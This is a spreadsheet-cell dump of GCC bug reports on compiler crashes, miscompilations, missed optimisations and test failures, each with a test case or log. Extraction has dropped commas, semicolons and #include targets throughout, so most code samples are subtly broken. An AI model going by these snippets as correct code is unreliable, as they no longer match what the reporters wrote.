 From: bangerth@dealii.org [mailto:bangerth@dealii.org] 
 Sent: Wednesday April 09 2003 2:50 PM
 To: David Berger gcc-bugs@gcc.gnu.org gcc-prs@gcc.gnu.org nobody@gcc.gnu.org
 Subject: Re: c++/10366: Unable to apply __attribute__ ((packed)) to an enum
 Synopsis: Unable to apply __attribute__ ((packed)) to an enum
 State-Changed-From-To: open-&gt;closed
 State-Changed-By: bangerth
 State-Changed-When: Wed Apr  9 21:50:14 2003
 State-Changed-Why:
     Already fixed in mainline.
 http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view%20audit-trail&amp;database=gcc&amp;pr=10366
</t>
  </si>
  <si>
    <t>GCC-30681</t>
  </si>
  <si>
    <t>obsolescent vs. obsolete</t>
  </si>
  <si>
    <t>For a code with an arithmetic IF for example
program xx
implicit none
integer :: i
i = 0
if (i) 102030
10 print*negative
stop
20 print*zero
stop
30 print*positive
stop
end program xx
mingw gfortran 4.3.0 20061021 says
 In file xarithmetic_if.f90:5
if (i) 102030
              1
Warning: Obsolete: arithmetic IF statement at (1)
According to the Fortran 95 Handbook the arithmetic IF is obsolescent not obsolete.
The Fortran 2003 standard lists the following features as obsolescent in section B.2 Obsolescent features.
5 (1) Arithmetic IF â€” use the IF statement (8.1.2.4) or IF construct (8.1.2).
6 (2) Shared DO termination and termination on a statement other than END DO or CON7
TINUE â€” use an END DO or a CONTINUE statement for each DO statement.
8 (3) Alternate return â€” see B.2.1.
9 (4) Computed GO TO statement â€” see B.2.2.
10 (5) Statement functions â€” see B.2.3.
11 (6) DATA statements amongst executable statements â€” see B.2.4.
12 (7) Assumed length character functions â€” see B.2.5.
13 (8) Fixed form source â€” see B.2.6.
14 (9) CHARACTER* form of CHARACTER declaration â€” see B.2.7.
Gfortran should use the term obsolescent rather than obsolete for all of these features. I have only looked at arithmetic IF.</t>
  </si>
  <si>
    <t>GCC-41997</t>
  </si>
  <si>
    <t>[C++0x] constant initializer_list not optimised</t>
  </si>
  <si>
    <t>In C++0x constant initializer_lists do not seem visible to the optimiser leading to sub-optimal code. Consider as a simple example:
#include 
int max_val(std::initializer_list il)
{
	int i = *(il.begin())
	int j = *(il.begin() + 1)
	return (i &gt; j ? i : j)
}
int main(void)
{
	return max_val({12})
}
I would expect 'main' to be reduced to just '2' at a suitable optimisation level. At -O3 the body max_val is inlined the values {12} are not. Is there some reason constant initalizer_lists cannot be made visible to optimisation?</t>
  </si>
  <si>
    <t>GCC-6205</t>
  </si>
  <si>
    <t>-O -fpmath=sse breaks visibility of register accumulated sum</t>
  </si>
  <si>
    <t>result of a float sum in SSE register is seen as NaN in certain contexts when built with -O -mfpmath=sse
Problem originally seen in larger examples in g77 case available on request.
Release:
3.1
Environment:
linux-SuSE 7.3 or cygwin/2K
How-To-Repeat:
gcc -O -march=pentium3 -mfpmath=sse badsum.c
./a.out
result seen as nan in printf() but is OK if -O or -mfpmath options are removed</t>
  </si>
  <si>
    <t>GCC-78513</t>
  </si>
  <si>
    <t>[7 Regression] Failure to build linux kernel with KASAN support</t>
  </si>
  <si>
    <t>I'm trying to build the Linux kernel 4.8.10 downloaded from kernel.org using an aarch64-none-linux-gnu trunk toolchain (r242837).
I'm building a defconfig kernel with the additional:
 CONFIG_KASAN=y
 CONFIG_KASAN_OUTLINE=y
in the .config file to enable KASAN.
This works with a GCC 6 compiler. With trunk this fails to link with many undefined references for example:
net/built-in.o: In function `ethtool_set_per_queue':
ncsi-manage.c:(.text+0x5e2a8): undefined reference to `__asan_unpoison_stack_memory'
ncsi-manage.c:(.text+0x5e398): undefined reference to `__asan_poison_stack_memory'
I guess this has something to do with the libsanitizer merge?</t>
  </si>
  <si>
    <t>GCC-60327</t>
  </si>
  <si>
    <t>[4.9 Regression] xalanbmk and dealII ICE in ipa-inline-analysis.c:3555</t>
  </si>
  <si>
    <t>Both xalanbmk and dealII ICE when built with -Ofast -funroll-loops -fpeel-loops -march=native -flto -fwhole-program -flto-partition=none (AMD Fam10) like
lto1: internal compiler error: Segmentation fault
0x7ea3bf crash_signal
        /gcc/spec/sb-barbella.arch.suse.de-ai-64/gcc/gcc/toplev.c:337
0x68d839 inline_update_overall_summary(cgraph_node*)
        /gcc/spec/sb-barbella.arch.suse.de-ai-64/gcc/gcc/ipa-inline-analysis.c:3555        
0x6a7843 walk_polymorphic_call_targets
        /gcc/spec/sb-barbella.arch.suse.de-ai-64/gcc/gcc/ipa.c:229
0x6a7843 symtab_remove_unreachable_nodes(bool _IO_FILE*)
        /gcc/spec/sb-barbella.arch.suse.de-ai-64/gcc/gcc/ipa.c:400
0x744edb execute_todo
        /gcc/spec/sb-barbella.arch.suse.de-ai-64/gcc/gcc/passes.c:1896
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: /gcc/spec/sb-barbella.arch.suse.de-ai-64/x86_64/install-hack/bin/g++ returned 1 exit status
/usr/bin/ld: fatal error: lto-wrapper failed
collect2: error: ld returned 1 exit status
specmake: *** [dealII] Error 1</t>
  </si>
  <si>
    <t>GCC-31107</t>
  </si>
  <si>
    <t>--target-help doesn't say which options are compiler assembler or linker options</t>
  </si>
  <si>
    <t>--target-help shows compiler assembler and linker options together without saying which is which. It can confuse users (see PR31073 for example).
Example: on i686-pc-linux-gnu with mainline:
$ gcc --target-help | tail -n 35
  -mtune=                     Schedule code for given CPU
  -muclibc                    Use uClibc instead of GNU libc
  -Q                      ignored
  -V                      print assembler version number
  -k                      ignored
  -n                      Do not optimize code alignment
  -q                      quieten some warnings
  -s                      ignored
  --divide                ignored
elf_i386: 
  -Bgroup               Selects group name lookup rules for DSO
  --disable-new-dtags   Disable new dynamic tags
  --enable-new-dtags    Enable new dynamic tags
  --eh-frame-hdr        Create .eh_frame_hdr section
  -z combreloc          Merge dynamic relocs into one section and sort
  -z defs               Report unresolved symbols in object files.
  -z execstack          Mark executable as requiring executable stack
  -z initfirst          Mark DSO to be initialized first at runtime
  -z interpose          Mark object to interpose all DSOs but executable
  -z loadfltr           Mark object requiring immediate process
  -z muldefs            Allow multiple definitions
  -z nocombreloc        Don't merge dynamic relocs into one section
  -z nocopyreloc        Don't create copy relocs
  -z nodefaultlib       Mark object not to use default search paths
  -z nodelete           Mark DSO non-deletable at runtime
  -z nodlopen           Mark DSO not available to dlopen
  -z nodump             Mark DSO not available to dldump
  -z noexecstack        Mark executable as not requiring executable stack
  -z norelro            Don't create RELRO program header
  -z now                Mark object non-lazy runtime binding
  -z origin             Mark object requiring immediate $ORIGIN processing
                          at runtime
  -z relro              Create RELRO program header
  -z KEYWORD            Ignored for Solaris compatibility
The first options displayed above are the last of the compiler options followed (without any explicit mention) by the assembler options and the linker options.
Users then want to try an option in the list and it doesn't work:
$ gcc --eh-frame-hdr a.c      
cc1: error: unrecognized command line option -feh-frame-hdr</t>
  </si>
  <si>
    <t>GCC-14425</t>
  </si>
  <si>
    <t>[4.0 Regression] vec_splat broken</t>
  </si>
  <si>
    <t>#include 
vector unsigned int splat0(vector unsigned int x)
{
    return vec_splat(x 0)
}
$PREFIX/bin/g++ -faltivec -S splat.c 
/Volumes/Space/Users/bungi/Source/GNU/gcc/gcc-tree-ssa/install/bin/../lib/gcc/powerpc-
apple-darwin7.2.0/3.5-tree-ssa/include/altivec.h: In function `__bool int __vector__ 
vec_splat(__bool int __vector__ int)':
/Volumes/Space/Users/bungi/Source/GNU/gcc/gcc-tree-ssa/install/bin/../lib/gcc/powerpc-
apple-darwin7.2.0/3.5-tree-ssa/include/altivec.h:4562: error: argument 2 must be a 5-bit 
unsigned literal
/Volumes/Space/Users/bungi/Source/GNU/gcc/gcc-tree-ssa/install/bin/../lib/gcc/powerpc-
apple-darwin7.2.0/3.5-tree-ssa/include/altivec.h: In function `unsigned int __vector__ 
vec_splat(unsigned int __vector__ int)':
/Volumes/Space/Users/bungi/Source/GNU/gcc/gcc-tree-ssa/install/bin/../lib/gcc/powerpc-
apple-darwin7.2.0/3.5-tree-ssa/include/altivec.h:4556: error: argument 2 must be a 5-bit 
unsigned literal</t>
  </si>
  <si>
    <t>tjw</t>
  </si>
  <si>
    <t>GCC-13203</t>
  </si>
  <si>
    <t>-fmem-report Total usage is not correct</t>
  </si>
  <si>
    <t>On a variant of one of our most popular PRs PR8361 current CVS on the
tree-ssa branch built with -DGATHER_STATISTICS results in the following
for g++ -fmem-report -O3 generate-3.4.ii:
 Size   Allocated        Used    Overhead
 8             17M         17M        401k
 16            23M         23M        351k
 32           117M        117M       1292k
 64            41M         41M        370k
 128         2100k       2098k         16k
 256           18M         18M        132k
 512           18M         18M        129k
 1024          22M         22M        159k
 2048          11M         11M         83k
 4096          11M         11M         80k
 8192          12M         12M         43k
 16384         14M         14M         24k
 32768         11M         11M       9968
 65536       9216k       9216k       4032
 131072       9728k       9728k       2128
 262144       7168k       7168k        784
 116           98M         97M        788k
 24           195M        194M       2348k
 12            43M         43M        738k
 40            67M         67M        675k
 Total        753M        208M       7652k &lt;==========
 Total Overhead:                          83473230
 Total Allocated:                        788180256
Note how the usage column in the third to last line (Total) does not really
seem to sum up the entries in that column.</t>
  </si>
  <si>
    <t>GCC-22088</t>
  </si>
  <si>
    <t>The following testcase causes an ICE on i686-pc-linux-gnu when compiled with
-O -march=pentium4 -ftree-vectorize:
===============================
double d[3]
void foo() 
{ 
    int i
    for (i=0 i&lt;3 ++i)
        d[i] = 0
}
===============================
bug.c: In function 'foo':
bug.c:4: internal compiler error: in get_bb_copy at cfg.c:1078
Please submit a full bug report [etc.]
The regression was introduced yesterday (2005-06-15).</t>
  </si>
  <si>
    <t>GCC-41705</t>
  </si>
  <si>
    <t>missed if conversion optimization</t>
  </si>
  <si>
    <t>Compile the attached source code with options -Os -march=armv5te -mthumb gcc generates:
        push    {lr}
        ldr     r3 [r0]
        cmp     r3 #0               // B
        bne     .L3
        ldr     r3 [r0 #4]
        b       .L2
.L3:
        mov     r3 #0               // A
.L2:
        ldr     r2 [r0 #8]
        @ sp needed for prologue
        ldr     r0 [r2]
        add     r0 r3 r0
        pop     {pc}
Instruction A can be moved before instruction B which should be handled by ifcvt.c:find_if_case_2. Notice the following code in find_if_header:
  if (dom_info_state (CDI_POST_DOMINATORS) &gt;= DOM_NO_FAST_QUERY
      &amp;&amp; (! HAVE_conditional_execution || reload_completed))
    {
      if (find_if_case_1 (test_bb then_edge else_edge))
	goto success
      if (find_if_case_2 (test_bb then_edge else_edge))
	goto success
    }
After reload_completed the target of conditional assignment is happened to be allocated to the same physical register as the condition variable. This prevent it from moving to the front of compare and branch instructions.
Before reload_completed HAVE_conditional_execution prevent find_if_case_2 to be called. So we missed this optimization chance.
Target ARM has conditional execution capability but thumb actually can't do conditional execution. Do we have any method to let the compiler know this?</t>
  </si>
  <si>
    <t>GCC-69842</t>
  </si>
  <si>
    <t>[6 Regression] Parameter deduction in polymorphic lambdas</t>
  </si>
  <si>
    <t>The following code fails to compile with gcc-6-20160214. It used to work with gcc-5.3 and clang also accepts it. Compile with -std=c++14.
#include 
int main()
{
        auto const g([](auto &amp;&amp; _var) {
                static_assert(std::is_same&lt;int 
        })
        g(0)
}
I don't have the C++14 standard handy so I am not sure if this is correct behavior or not. In any case this breaks code that perfectly forwards using a lambda.</t>
  </si>
  <si>
    <t>carlphilippreh</t>
  </si>
  <si>
    <t>GCC-44835</t>
  </si>
  <si>
    <t>Ada Assert Failure with Bug Box einfo.adb:1687</t>
  </si>
  <si>
    <t>I was trying to learn OOP in Ada and ran into this Assert Box:
$ gcc -c small.adb
+===========================GNAT BUG DETECTED==============================+
| 4.4.4 20100503 (Red Hat 4.4.4-2) (x86_64-redhat-linux-gnu) Assert_Failure einfo.adb:1687|
| Error detected at small.adb:33:7                                         |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
small.adb
list may be incomplete
compilation abandoned
My system:
$ uname -a
Linux localhost.localdomain 2.6.33.5-124.fc13.x86_64 #1 SMP Fri Jun 11 09:38:12 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/redhat-release
Fedora release 13 (Goddard)
$ rpm -qa | grep gnat
gcc-gnat-4.4.4-2.fc13.x86_64
libgnat-4.4.4-2.fc13.x86_64
libgnat-devel-4.4.4-2.fc13.x86_64
$ gcc --version
gcc (GCC) 4.4.4 20100503 (Red Hat 4.4.4-2)
I also tested on gcc 4.3.2 with the same result:
+===========================GNAT BUG DETECTED==============================+
| 4.3.2 20081105 (Red Hat 4.3.2-7) (i386-redhat-linux-gnu) Assert_Failure einfo.adb:1698|
| Error detected at small.adb:33:7                                         |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
(Will upload small.adb when I find the upload button).</t>
  </si>
  <si>
    <t>bileam</t>
  </si>
  <si>
    <t>GCC-6810</t>
  </si>
  <si>
    <t>GCC 3.1 generates incorrect code if -O2 -mcpu=pentium3 -fomit-frame-pointer are specified</t>
  </si>
  <si>
    <t>Compiling the code sample using -O2 -march=pentium3 -fomit-frame-pointer generates code that does not correctly calculate the addresses of local variables.
Namely the address of local array c1 in testfunc2 is not correctly passed to dummy_func.
The reason is the leal instruction (*) in the prologue to testfunc2 that incorrectly appears before _alloca is called but should be placed after the _alloca call.
_testfunc2:
        pushl   %ebp
        movl    $24076 %eax
        pushl   %edi
        pushl   %esi
        pushl   %ebx
        leal    18064(%esp) %esi (*)
        call    __alloca
        movl    %esi 8(%esp)
Release:
gcc version 3.1
Environment:
Windows NT 4.0 SP6 Pentium III (Coppermine) 850 MHz Cygwin
How-To-Repeat:
Correct code is generated with -fno-omit-frame-pointer:
$ gcc -Wall -O2 -march=pentium3 -fno-omit-frame-pointer -fverbose-asm bugofp.i -o bugofp.exe
$ ./bugofp.exe
a1a1a1a1 a2a2a2a2 a3a3a3a3 a4a4a4a4 a5a5a5a5 a6a6a6a6 a7a7a7a7 a8a8a8a8 a9a9a9a9 aaaaaaaa abababab acacacac
-fomit-frame-pointer triggers the bug:
$ gcc -Wall -O2 -march=pentium3 -fomit-frame-pointer -fverbose-asm bugofp.i -o bugofp.exe
$ ./bugofp.exe
a1a1a1a1 a2a2a2a2 0 a4a4a4a4 a5a5a5a5 a6a6a6a6 a7a7a7a7 a8a8a8a8 a9a9a9a9 aaaaaaaa abababab acacacac</t>
  </si>
  <si>
    <t>GCC-17713</t>
  </si>
  <si>
    <t>Rejects call where array element is used as scalar</t>
  </si>
  <si>
    <t>GNU Fortran 95 (GCC 4.0.0 20040928 (experimental)) complains: 
$ ~/gcc/bin/gfortran -c typerank.f90  
 In file typerank.f90:26 
     call gauss( x(i) a yan dyda ma ) 
               1 
Error: Type/rank mismatch in argument 'x' at (1) 
I cannot see what is wrong here.  The type is double precision the rank is 
0 (scalar) and the intent is (in) for both the dummy and the actual argument.</t>
  </si>
  <si>
    <t>GCC-65941</t>
  </si>
  <si>
    <t>FAIL: g++.dg/other/pr59492.C: no such instruction: rdrand</t>
  </si>
  <si>
    <t>gcc.sum (unix/-m32):
...
FAIL: g++.dg/other/pr59492.C  -std=gnu++11 (test for excess errors)
FAIL: g++.dg/other/pr59492.C  -std=gnu++14 (test for excess errors)
FAIL: g++.dg/other/pr59492.C  -std=gnu++98 (test for excess errors)
...
g++.log:
...
build/gcc/testsuite/g++1/../../xg++ -Bbuild/gcc/testsuite/g++1/../../ -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -Ibuild/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/x86_64-unknown-linux-gnu -Ibuild/x86_64-unknown-linux-gnu/32/libstdc++-v3/include -Isrc/libstdc++-v3/libsupc++ -Isrc/libstdc++-v3/include/backward -Isrc/libstdc++-v3/testsuite/util -fmessage-length=0 -std=gnu++98 -mx32 -fPIC -c -m32 -o pr59492.o src/gcc/testsuite/g++.dg/other/pr59492.C
/tmp/ccSwV0hl.s: Assembler messages:
/tmp/ccSwV0hl.s:24: Error: no such instruction: `rdrand %edx'
compiler exited with status 1
FAIL: g++.dg/other/pr59492.C  -std=gnu++98 (test for excess errors)
...
as version:
...
GNU assembler (GNU Binutils for Ubuntu) 2.20.1-system.20100303
...</t>
  </si>
  <si>
    <t>GCC-10878</t>
  </si>
  <si>
    <t>miscompilation of boolean parameters from bytecode</t>
  </si>
  <si>
    <t>Boolean parameter will be misinterpreted when compiled from bytecode rather than from java source.
See in assembly (when compiled without any optimizations):
movb	%al -1(%ebp)
then referencing the variable:
movl	-8(%ebp) %edx
Release:
3.2.2
Environment:
mingw linux
How-To-Repeat:
Compile the java source to bytecode then compile it with gcj to produce assembly listing. Watch for the parameter representation of the boolean variable in the stack.</t>
  </si>
  <si>
    <t>szabo.daniel</t>
  </si>
  <si>
    <t>GCC-17565</t>
  </si>
  <si>
    <t>[3.3 only] asms in delay slots</t>
  </si>
  <si>
    <t>The MIPS port allows asms to be put into delay slots if the
compiler guesses they are only one instruction long.  This is
wrong because of the possibiltiy of it containing macros.
The problem can be reproduced as an assembler warning
in the following testcase:
int foo (int n)
{
  register int k asm ($16) = n
  if (k &gt; 0)
    {
      bar ()
      asm (li %00x12345678 : =r (k))
    }
  return k
}
because the multi-instruction asm statement goes into the delay
slot of the call to bar().
This is reduced from a much more serious linux problem.
Linux is fond of using empty asm statements and since gcc estimates
empty asms to be one instruction long they too might be put into
delay slots.  This actually has the effect of putting the following
instruction into the delay slot instead.  Since there's no assembler
warning the problem was only detected as a run-time failure.
This problem goes back to at least 2.95.
Richard</t>
  </si>
  <si>
    <t>GCC-49170</t>
  </si>
  <si>
    <t>[4.7 regression] Several libstdc++ tests fail to link on Solaris 8/9: cexp missing</t>
  </si>
  <si>
    <t>Between 20110523 and 20110525 several libstdc++ tests fail to link on Solaris
8 and 9 (both SPARC and x86) that lacks cexp in libm:
FAIL: 26_numerics/complex/13450.cc (test for excess errors)
Excess errors:
Undefined			first referenced
 symbol  			    in file
cexp                                /var/tmp//ccvyjKLM.o
cexpf                               /var/tmp//ccvyjKLM.o
cexpl                               /var/tmp//ccvyjKLM.o
ld: fatal: Symbol referencing errors. No output written to ./13450.exe
Comparing -save-temps output before and after the patch I find no changes to
the .ii file no calls to cexp before the patch but calls after.
I very strongly suspect this patch:
2011-05-24  Bill Schmidt  
        PR tree-optimization/46728
        * tree-ssa-math-opts.c (powi_table): New.
        (powi_lookup_cost): New.
        (powi_cost): New.
        (powi_as_mults_1): New.
        (powi_as_mults): New.
        (gimple_expand_builtin_powi): New.
        (execute_cse_sincos): Add switch case for BUILT_IN_POWI.
        (gate_cse_sincos): Remove sincos/cexp restriction.
Please fix.
  Rainer</t>
  </si>
  <si>
    <t>GCC-7714</t>
  </si>
  <si>
    <t>inlining of function with inline assembler causes duplicate assembler lables</t>
  </si>
  <si>
    <t>I found a similar bug to PR233 and was disappointed to
see that PR233 was closed appearantly just because the
URL to the test case became a broken link.
I think I have found a manifistaion of the same bug 
although it doesn't involve unrolling loops.  It involves 
inlining of functions with inline-assembler lables in it...
I have included a minimal test case 
As far as I am aware the code itself (while not 
technically vailid ANSI C because ANSI C doesn't 
explicitly allow inline assembler) should be valid in
gcc.
Release:
gcc 3.1.1
Environment:
Linux Mandrake 8.1
How-To-Repeat:
gcc -O3 -c -o InlineLableBug.o InlineLableBug.c</t>
  </si>
  <si>
    <t>linux_dr</t>
  </si>
  <si>
    <t>GCC-14608</t>
  </si>
  <si>
    <t xml:space="preserve"> nukes isfinite macro from </t>
  </si>
  <si>
    <t>I will attach two test cases to this bug.  The first test case was provided to
me by a customer it is a cut-down version of a larger piece of code that did
need both  and .  The observed problem is that if both these
headers are included (in either order) in the same translation unit the
isfinite macro (part of C99) is not available to subsequent code.  If only
 is included then isfinite is available.
The second test case is the workaround that I found for GCC 3.3.3.  It does not
work with GCC 3.4 even with the obvious s/GLIBCPP/GLIBCXX/.
It should be noted that HPUX's libc does not implement all of C99 but it *does*
provide all of the C99 math functions - but isfinite() and friends are only
macros (which is allowed by C99).  I don't know what the C++ standard specifies
in this area but it seems to me that QoI dictates that C++ programs be able to
use all the system-provided library facilities.</t>
  </si>
  <si>
    <t>GCC-36822</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in subst_reloads</t>
  </si>
  <si>
    <t>s390x fails to build the linux kernel
./cc1 -quiet -O smp.3.i
Program received signal SIGSEGV Segmentation fault.
0x00000000008276f4 in subst_reloads (insn=0x7fc1f2451a00)
    at /space/rguenther/src/svn/trunk/gcc/reload.c:6181
6181              gcc_assert (GET_CODE (*r-&gt;where) != LABEL_REF
(gdb) print *r-&gt;where
$1 = (rtx) 0x2b
testcase:
typedef unsigned char __u8
typedef unsigned int __u32
typedef unsigned long __u64
struct _lowcore {
    __u8 pad8[0xc00-0x2a0]
    __u64 save_area[16]
    __u8 pad9[0xd40-0xc80]
    __u64 thread_info
    __u64 ext_call_fast
    __u8 pad13[0x1200-0xe04]
    __u64 floating_pt_save_area[16]
    __u64 gpregs_save_area[16]
    __u32 st_status_fixed_logout[4]
    __u32 access_regs_save_area[16]
    __u64 cregs_save_area[16]
}
int __cpu_up(unsigned int cpu)
{
    struct _lowcore *cpu_lowcore
    typedef struct {
	char _[sizeof(cpu_lowcore-&gt;cregs_save_area[0])]
    } addrtype
    asm volatile( stctg %2%30(%1)\n
		  : =m (*(addrtype *)(cpu_lowcore-&gt;cregs_save_area[0]))
		  : a (
}</t>
  </si>
  <si>
    <t>GCC-13583</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 Regression] __use_cache not threadsafe</t>
  </si>
  <si>
    <t>This fragment in __use_cache (taken from the 3.3 branch) is not threadsafe:
      if (__builtin_expect(!__cache false))
        {
          __cache = new __locale_cache(__loc)
          __loc._M_impl-&gt;_M_install_cache(__cache __i)
        }
If this code is executed by two threads at the same time two instances of
the cache are created of which one will be leaked.
The version on mainline has the same problem.
Since __use_cache first appeard in 3.3.1 this is a regression.</t>
  </si>
  <si>
    <t>GCC-48020</t>
  </si>
  <si>
    <t>libgo flag test FAILs on Solaris 2</t>
  </si>
  <si>
    <t>The libgo flag test FAILs on Solaris 2:
FAIL: flag
flag provided but not defined: -x
--- FAIL: flag_test.TestEverything
	VisitAll misses some flags
	Visit fails after set
If it is invoked with -match TestEverything the test works the failure only
occurs with -match 'TestEverything|TestChangingArgs'
In the failing case visitor is called with
  after
  before
  after
  before
  ...
on success (i.e. with TestEverything alone) with
  v
  test_uint64
  match
  test_bool
  test_string
  test_float64
  ...</t>
  </si>
  <si>
    <t>GCC-23840</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 Regression] Bogus invalid lvalue in unary '&amp;' diagnostic and ICE with va_arg</t>
  </si>
  <si>
    <t>#include 
struct S
{
  int f(int n) { return n }
}
void f(int i ...)
{
  va_list ap
  va_start(ap i)
  va_arg(ap S).f(0)
}
yields a bogus diagnostic and ICE with current mainline:
t2.cc: In function 'void f(int ...)':
t2.cc:10: error: invalid lvalue in unary '&amp;'
tree check: expected class 'type' have 'exceptional' (error_mark) in
pp_c_type_qualifier_list at c-pretty-print.c:232
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
4.0 also gives a bogus diagnostic:
t2.cc: In function 'void f(int ...)':
t2.cc:10: error: invalid lvalue in unary '&amp;'
t2.cc:10: error: no matching function for call to 'S::f(int)'
t2.cc:4: note: candidates are: int S::f(int)
as does 3.4 while 3.3 compiles the test OK.</t>
  </si>
  <si>
    <t>GCC-3608</t>
  </si>
  <si>
    <t>Virtual funtions called with wrong this pointer when having virtual inheritance</t>
  </si>
  <si>
    <t>When invoking a virtual function via a base class pointer the function receives a wrong this pointer. This happens only when having virtual inheritance. I suppose it receives the this pointer for the most-derived object.
This causes no problem (i.e. both this pointers in the ctor and the virtual method are equal) because object b is the most-derived one:
#include 
#include 
using namespace std
class A
{
public:
  A (void)
  {
  }
  virtual ~A (void)
  {
  }
  virtual void t (void)
  {
  }
}
void T (A *a)
{
  a-&gt;t ()
}
class B : public virtual A
{
public:
  B (void)
  {
    cerr &lt;&lt; Ctor:  &lt;&lt; hex &lt;&lt; (unsigned)this &lt;&lt; endl
    T (this)
  }
  virtual ~B (void)
  {
  }
  virtual void t (void)
  {
    cerr &lt;&lt; t:     &lt;&lt; hex &lt;&lt; (unsigned)this &lt;&lt; endl
  }
}
int main (void)
{
  B b
  return 0
}
This causes no problem because class C does not have extra members over class B and (C *) is equivalent to (B *):
#include 
#include 
using namespace std
class A
{
public:
  A (void)
  {
  }
  virtual ~A (void)
  {
  }
  virtual void t (void)
  {
  }
}
void T (A *a)
{
  a-&gt;t ()
}
class B : public virtual A
{
public:
  B (void)
  {
    cerr &lt;&lt; Ctor:  &lt;&lt; hex &lt;&lt; (unsigned)this &lt;&lt; endl
    T (this)
  }
  virtual ~B (void)
  {
  }
  virtual void t (void)
  {
    cerr &lt;&lt; t:     &lt;&lt; hex &lt;&lt; (unsigned)this &lt;&lt; endl
  }
}
class C : public B
{
public:
  C (void)
  {
  }
  virtual ~C (void)
  {
  }
}
int main (void)
{
  C c
  return 0
}
This causes the problem because (I suppose) the virtual inheritance of class C adds some hidden extra fields:
#include 
#include 
using namespace std
class A
{
public:
  A (void)
  {
  }
  virtual ~A (void)
  {
  }
  virtual void t (void)
  {
  }
}
void T (A *a)
{
  a-&gt;t ()
}
class B : public virtual A
{
public:
  B (void)
  {
    cerr &lt;&lt; Ctor:  &lt;&lt; hex &lt;&lt; (unsigned)this &lt;&lt; endl
    T (this)
  }
  virtual ~B (void)
  {
  }
  virtual void t (void)
  {
    cerr &lt;&lt; t:     &lt;&lt; hex &lt;&lt; (unsigned)this &lt;&lt; endl
  }
}
class C : public virtual B
{
public:
  C (void)
  {
  }
  virtual ~C (void)
  {
  }
}
int main (void)
{
  C c
  return 0
}
This causes the problem because class C has extra fields over class B:
#include 
#include 
using namespace std
class A
{
public:
  A (void)
  {
  }
  virtual ~A (void)
  {
  }
  virtual void t (void)
  {
  }
}
void T (A *a)
{
  a-&gt;t ()
}
class B : public virtual A
{
public:
  B (void)
  {
    cerr &lt;&lt; Ctor:  &lt;&lt; hex &lt;&lt; (unsigned)this &lt;&lt; endl
    T (this)
  }
  virtual ~B (void)
  {
  }
  virtual void t (void)
  {
    cerr &lt;&lt; t:     &lt;&lt; hex &lt;&lt; (unsigned)this &lt;&lt; endl
  }
}
class C : public B
{
  int i
public:
  C (void)
  {
  }
  virtual ~C (void)
  {
  }
}
int main (void)
{
  C c
  return 0
}
Both the erroneous examples are OK with Micro$oft Visual C++ 6.0. Shame on you! :-)))
In the following days I will try to test these examples on Solaris 7 ULTRASPARC with gcc 2.9x.xx to find out if this is an architecture-specific or general bug.
Release:
2.95.3 20010315 (release)
Environment:
i386-slackware-linux
How-To-Repeat:
g++ example.cpp
and run the resulting a.out.</t>
  </si>
  <si>
    <t>gbr</t>
  </si>
  <si>
    <t>GCC-33474</t>
  </si>
  <si>
    <t>bfin: ICE: RTL check: expected code 'set' or 'clobber' have 'parallel' in bfin_adjust_cost at config/bfin/bfin.c:3120</t>
  </si>
  <si>
    <t>Build failure in target libiberty:
/home/rask/build/gcc-bfin-unknown-elf/./gcc/xgcc -B/home/rask/build/gcc-bfin-unknown-elf/./gcc/ -nostdinc -B/home/rask/build/gcc-bfin-unknown-elf/bfin-unknown-elf/newlib/ -isystem /home/rask/build/gcc-bfin-unknown-elf/bfin-unknown-elf/newlib/targ-include -isystem /n/12/rask/src/all/newlib/libc/include -B/home/rask/build/gcc-bfin-unknown-elf/bfin-unknown-elf/libgloss/bfin -L/home/rask/build/gcc-bfin-unknown-elf/bfin-unknown-elf/libgloss/libnosys -L/n/12/rask/src/all/libgloss/bfin -B/usr/local/bfin-unknown-elf/bin/ -B/usr/local/bfin-unknown-elf/lib/ -isystem /usr/local/bfin-unknown-elf/include -isystem /usr/local/bfin-unknown-elf/sys-include -L/home/rask/build/gcc-bfin-unknown-elf/./ld -c -DHAVE_CONFIG_H -O2 -g -O2   -I. -I/n/12/rask/src/all/libiberty/../include  -W -Wall -Wwrite-strings -Wc++-compat -Wstrict-prototypes -pedantic  /n/12/rask/src/all/libiberty/hashtab.c -o hashtab.o
/n/12/rask/src/all/libiberty/hashtab.c: In function 'iterative_hash':
/n/12/rask/src/all/libiberty/hashtab.c:955: internal compiler error: RTL check: expected code 'set' or 'clobber' have 'parallel' in bfin_adjust_cost at config/bfin/bfin.c:3120
Configure flags:
--target bfin-unknown-elf --enable-checking=yesrtl --with-newlib --enable-sim --disable-gdb --disable-nls</t>
  </si>
  <si>
    <t>GCC-652</t>
  </si>
  <si>
    <t>Code generation bug on alpha EV56</t>
  </si>
  <si>
    <t>When a sub-block of a function re-declares (hides) a local-variable of the same
name GCC messes up the data on the stack.
Release:
2.97
Environment:
System: Linux ludwig-alpha 2.4.0-test9 #7 Tue Oct 17 13:42:13 CEST 2000 alpha unknown
Architecture: alpha
host: alpha-redhat-linux-gnu
build: alpha-redhat-linux-gnu
target: alpha-redhat-linux-gnu
How-To-Repeat:
Compare the assembly generated by this pre-processed input when compiled with
-O2 -mcpu=ev56 to the same assembly when the line # 21822 is changed from
 int width = info-&gt;width
to
 width = info-&gt;width
In the first case the local variable numend is partly overwritten when the
width variable is manipulated at lines # 22070 and following.
The test file is from glibc-2.1.95.
